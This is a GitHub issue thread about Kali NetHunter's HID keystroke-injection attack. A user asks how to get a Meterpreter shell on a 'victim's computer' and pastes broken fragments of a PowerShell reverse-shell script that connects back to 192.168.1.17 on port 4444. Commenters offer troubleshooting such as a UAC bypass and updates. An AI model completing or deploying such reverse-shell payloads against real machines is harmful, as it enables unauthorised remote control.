### ISSUE TITLE
HID help explain

### ISSUE THREAD

**Issue by ShaharLahav** [offensive-security/kali-nethunter#394]
Hi, I am very sorry for the silly question:
Can you explain me how the HID works? i mean, what should I do in order to use the meterpreter in my kali linux to control the victim's computer ?
I've tried to just execute the powersploit attack with the configured port and host, but nothing happens, I mean  the cmd shows a lot of 'unrecognized' as in wrong commands...
I haven't put anything in the URL (i dont know what to put there) 
Again, sorry for the question, I'll understand if you laugh at me...

**Comment by ShaharLahav** [comment]
?

**Comment by ShaharLahav** [comment]
Actually this is what I get : 

```
C:\WINDOWS\system32>unction cleanup {
'unction' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>if ($client.Connected -eq $true) {$client.Close()} ;if ($pro
cess.ExitCode -ne $null) {$process.Close()};exit}
-eq was unexpected at this time.

C:\WINDOWS\system32>$address = '192.168.1.17'
'$address' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>$port = '4444'
'$port' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>$client = New-Object system.net.sockets.tcpclient
'$client' is not recognized as an internal or external command,
operable program or batch file.

```

**Comment by loveclarie9633** [comment]
I have the same problem.I mean the powersploit doesn't work.when I update the powersploit, it 's nothing.And  when I execute attack, also nothing happens in my PC.

**Comment by JakTheRipper** [comment]
Make sure that the App "USB Keyboard" that was installed with NetHunter works. That will help you determin whether or not the computer is even recognizing NetHunter as an HID device.

**Comment by ShaharLahav** [comment]
Hi , the app works...

**Comment by JakTheRipper** [comment]
Have you tried setting the correct UAC Bypass?

**Comment by n00shE** [comment]
Make sure nethunter is the newest version. Not just the Chroot. Run "apt-get update && apt-get upgrade". That worked for me.

**Comment by n00shE** [comment]
The message you got was input directly into the command prompt. Not powershell. Could actually be victim PC issues

**Comment by benichmt1** [comment]
I am receiving this problem on the newest version of the app, 3.15.

Other ducky attacks work correctly. I can also correctly do the windows commands, for example, but the Powersploit tab gives me the above error.
